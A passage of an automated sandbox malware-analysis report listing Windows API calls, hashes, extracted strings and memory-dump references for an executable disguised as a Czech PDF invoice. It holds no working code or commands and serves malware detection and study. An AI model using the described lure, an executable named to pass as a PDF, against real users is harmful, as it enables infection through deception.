                          • Associated: 00000000.00000002.1226085015.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Vyuctovani_2024_07-1206812497#U00b7pdf.jbxd
                          Similarity
                          • API ID: CreateDirectoryErrorLast
                          • String ID:
                          • API String ID: 1375471231-0
                          • Opcode ID: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
                          • Instruction ID: 3f644fdd106e1ab94d9b7b1a4ff28047f9857eb9b1cb4b7a92225185e24a97ce
                          • Opcode Fuzzy Hash: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
                          • Instruction Fuzzy Hash: 54C04C30254602EED7105B60DF0D7277950AB60741F11843AA546E21A0DA348415E92D
                          APIs
                          • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040327C,00000000,0078B6D8,000000FF,0078B6D8,000000FF,000000FF,00000004,00000000), ref: 00405D5C
                          Memory Dump Source
                          • Source File: 00000000.00000002.1226053516.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1226037640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226068869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Vyuctovani_2024_07-1206812497#U00b7pdf.jbxd
                          Similarity
                          • API ID: FileWrite
                          • String ID:
                          • API String ID: 3934441357-0
                          • Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                          • Instruction ID: 7ae6caa888a0ef2d757d0491c4477122047cb4d8e5253970a61e6ecb635e967c
                          • Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                          • Instruction Fuzzy Hash: 1AE0EC3221065EABDF109E659C08EEB7B6CEF05360F048437F925E2190E631E9219FA4
                          APIs
                          • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032C6,00000000,00000000,0040310D,000000FF,00000004,00000000,00000000,00000000), ref: 00405D2D
                          Memory Dump Source
                          • Source File: 00000000.00000002.1226053516.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1226037640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226068869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Vyuctovani_2024_07-1206812497#U00b7pdf.jbxd
                          Similarity
                          • API ID: FileRead
                          • String ID:
                          • API String ID: 2738559852-0
                          • Opcode ID: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
                          • Instruction ID: dfad6e071291888bd351353a7774b3a4efad1a63d4ecbc46eb9a9253763bc299
                          • Opcode Fuzzy Hash: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
                          • Instruction Fuzzy Hash: 1FE0EC3225025AABDF509EA59C04EEB7B6CEF053A0F008837F915EA150D631E961DFE4
                          APIs
                          • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004041E3
                          Memory Dump Source
                          • Source File: 00000000.00000002.1226053516.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1226037640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226068869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Vyuctovani_2024_07-1206812497#U00b7pdf.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID:
                          • API String ID: 3850602802-0
                          • Opcode ID: 4f7e142c0b73324572861e51e4895595a613045da2a956c59d23be962e06f5a1
                          • Instruction ID: 7158d61747e6cf692c847813075eb8e37c349a614b5667278bd1dade1c6ac8ad
                          • Opcode Fuzzy Hash: 4f7e142c0b73324572861e51e4895595a613045da2a956c59d23be962e06f5a1
                          • Instruction Fuzzy Hash: 5BC09BF97447017BDA108B519D49F1777586794700F1584297350F60D0CA74E550D61D
                          APIs
                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403049,?,?,?,"C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe",004035A7,?), ref: 004032D7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1226053516.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1226037640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226068869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Vyuctovani_2024_07-1206812497#U00b7pdf.jbxd
                          Similarity
                          • API ID: FilePointer
                          • String ID:
                          • API String ID: 973152223-0
                          • Opcode ID: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
                          • Instruction ID: 64c0fffafe8abe290eaf2022e63b776f1a4a3bd25e2fde741040b5855636c72c
                          • Opcode Fuzzy Hash: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
                          • Instruction Fuzzy Hash: 70B01231140300BFDA214F00DF09F057B21AB90700F10C034B344780F086711075EB0D
                          APIs
                          • SendMessageW.USER32(00000028,?,00000001,00403FE6), ref: 004041C8
                          Memory Dump Source
                          • Source File: 00000000.00000002.1226053516.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1226037640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226068869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Vyuctovani_2024_07-1206812497#U00b7pdf.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID:
                          • API String ID: 3850602802-0
                          • Opcode ID: 12b0ae2962ef85dd80a6f14f68689ea05a74157d7519edd7707daa867acccfd2
                          • Instruction ID: 6c025a846befaa099d481c36b27a79c5fc7dd1f0b3caa6cf802aff4301849ee4
                          • Opcode Fuzzy Hash: 12b0ae2962ef85dd80a6f14f68689ea05a74157d7519edd7707daa867acccfd2
                          • Instruction Fuzzy Hash: 02B09236190A00BADA614B00EE09F457A62A7AC701F00C429B240240B0CAB200A0DB09
                          APIs
                          • KiUserCallbackDispatcher.NTDLL(?,00403F7F), ref: 004041B1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1226053516.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1226037640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226068869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Vyuctovani_2024_07-1206812497#U00b7pdf.jbxd
                          Similarity
                          • API ID: CallbackDispatcherUser
                          • String ID:
                          • API String ID: 2492992576-0
                          • Opcode ID: a54c0deb42ad23f47ecc7560c3a241b5f715d6adfa33d40084b76364b12d5f6c
                          • Instruction ID: 30bcdc9e1ec4e9f5bd758bba81a049f6052f636b6f7eedaabba742a71ce1d9c6
                          • Opcode Fuzzy Hash: a54c0deb42ad23f47ecc7560c3a241b5f715d6adfa33d40084b76364b12d5f6c
                          • Instruction Fuzzy Hash: 43A0113A008200AFCF028B80EF08C0ABB22ABE0300B22C038A28080030CB3208A0EB08
                          APIs
                          • lstrcpyW.KERNEL32(007A55C0,NUL), ref: 00405DFF
                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,?,00405F83,00000000,00000000), ref: 00405E23
                          • GetShortPathNameW.KERNEL32(?,007A55C0,00000400), ref: 00405E2C
                            • Part of subcall function 00405BFB: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405EDC,00000000,[Rename],00000000,00000000,00000000), ref: 00405C0B
                            • Part of subcall function 00405BFB: lstrlenA.KERNEL32(00000000,?,00000000,00405EDC,00000000,[Rename],00000000,00000000,00000000), ref: 00405C3D
                          • GetShortPathNameW.KERNEL32(?,007A5DC0,00000400), ref: 00405E49
                          • wsprintfA.USER32 ref: 00405E67
                          • GetFileSize.KERNEL32(00000000,00000000,007A5DC0,C0000000,00000004,007A5DC0,?), ref: 00405EA2
                          • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405EB1
                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405EE9
                          • SetFilePointer.KERNEL32(0040A558,00000000,00000000,00000000,00000000,007A51C0,00000000,-0000000A,0040A558,00000000,[Rename],00000000,00000000,00000000), ref: 00405F3F
                          • GlobalFree.KERNEL32(00000000), ref: 00405F50
                          • CloseHandle.KERNEL32(00000000), ref: 00405F57
                            • Part of subcall function 00405C96: GetFileAttributesW.KERNELBASE(00000003,00402EC2,C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe",004035A7,?), ref: 00405C9A
                            • Part of subcall function 00405C96: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe",004035A7,?), ref: 00405CBC
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1226053516.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1226037640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226068869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Vyuctovani_2024_07-1206812497#U00b7pdf.jbxd
                          Similarity
                          • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                          • String ID: %ls=%ls$NUL$[Rename]
                          • API String ID: 222337774-899692902
                          • Opcode ID: 1e4b3f9ed39bbde156711f5f56b5ab96e9de2d35df18f06069f2e470ca92d8c4
                          • Instruction ID: 79fb1c0cee59ffd8bbd64a651f170d2e34830711ca13212973128761534bd4bd
                          • Opcode Fuzzy Hash: 1e4b3f9ed39bbde156711f5f56b5ab96e9de2d35df18f06069f2e470ca92d8c4
                          • Instruction Fuzzy Hash: 56311270600B167BD2207B619D49F6B3B5CEF82754F14003ABA45F62D2EA7CD9058EAD
                          APIs
                          • CharNextW.USER32(?,*?|<>/":,00000000,00000000,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe",004032EC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403539), ref: 004063B8
                          • CharNextW.USER32(?,?,?,00000000), ref: 004063C7
                          • CharNextW.USER32(?,00000000,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe",004032EC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403539), ref: 004063CC
                          • CharPrevW.USER32(?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe",004032EC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403539), ref: 004063DF
                          Strings
                          • "C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe", xrefs: 00406355
                          • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00406356
                          • *?|<>/":, xrefs: 004063A7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1226053516.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1226037640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226068869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Vyuctovani_2024_07-1206812497#U00b7pdf.jbxd
                          Similarity
                          • API ID: Char$Next$Prev
                          • String ID: "C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe"$*?|<>/":$C:\Users\user~1\AppData\Local\Temp\
                          • API String ID: 589700163-3326224636
                          • Opcode ID: 7b766ee50bb8b1a0f4eab2cbe77ea87c6d078045d263edb3b82a780548374b37
                          • Instruction ID: 3cdd18ac116859ddb672b661bfd00c9550f0de21ebdd483a5959fc1bc7d7dc3e
                          • Opcode Fuzzy Hash: 7b766ee50bb8b1a0f4eab2cbe77ea87c6d078045d263edb3b82a780548374b37
                          • Instruction Fuzzy Hash: 0011941580061295DB302B149D40FBBA2F8EF55764F56803FED8AB32C0E7BC5CA296ED
                          APIs
                          • GetWindowLongW.USER32(?,000000EB), ref: 00404209
                          • GetSysColor.USER32(00000000), ref: 00404225
                          • SetTextColor.GDI32(?,00000000), ref: 00404231
                          • SetBkMode.GDI32(?,?), ref: 0040423D
                          • GetSysColor.USER32(?), ref: 00404250
                          • SetBkColor.GDI32(?,?), ref: 00404260
                          • DeleteObject.GDI32(?), ref: 0040427A
                          • CreateBrushIndirect.GDI32(?), ref: 00404284
                          Memory Dump Source
                          • Source File: 00000000.00000002.1226053516.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1226037640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226068869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.00000000007DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226451929.000000000081D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_Vyuctovani_2024_07-1206812497#U00b7pdf.jbxd
                          Similarity
                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                          • String ID:
                          • API String ID: 2320649405-0
                          • Opcode ID: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
                          • Instruction ID: 1aa763bcd1536a717e50237d4e11ffd777efd381c4440c982bb19b0576d7b9c9
                          • Opcode Fuzzy Hash: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
                          • Instruction Fuzzy Hash: DA219671500704ABCB219F78DD08B5B7BF8AF81754F04896DF995E22A0D734E908CB64
                          APIs
                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DB6
                          • MulDiv.KERNEL32(000DDA05,00000064,000DF2A0), ref: 00402DE1
                          • wsprintfW.USER32 ref: 00402DF1
                          • SetWindowTextW.USER32(?,?), ref: 00402E01
                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E13
                          Strings
                          • verifying installer: %d%%, xrefs: 00402DEB
                          Memory Dump Source
                          • Source File: 00000000.00000002.1226053516.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1226037640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226068869.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1226085015.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
